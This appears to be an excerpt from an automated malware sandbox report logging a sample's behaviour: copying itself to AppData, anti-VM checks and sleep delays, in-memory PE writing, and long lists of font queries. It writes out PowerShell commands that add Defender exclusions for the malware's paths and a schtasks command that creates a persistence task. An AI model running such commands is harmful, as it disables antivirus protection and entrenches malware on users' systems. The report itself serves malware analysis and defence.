                  Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7636Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7436Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exe TID: 7368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 8036Thread sleep time: -22136092888451448s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7828Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeThread delayed: delay time: 922337203685477
                  Source: wZWwzQVEakJvEU.exe, 0000000A.00000002.1856276345.0000000009BF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M
                  Source: nzLoHpgAln.exe, 00000008.00000002.1857292891.0000000000FA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                  Source: wZWwzQVEakJvEU.exe, 0000000E.00000002.1952277135.0000000001680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeMemory written: C:\Users\user\Desktop\nzLoHpgAln.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMemory written: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Users\user\Desktop\nzLoHpgAln.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
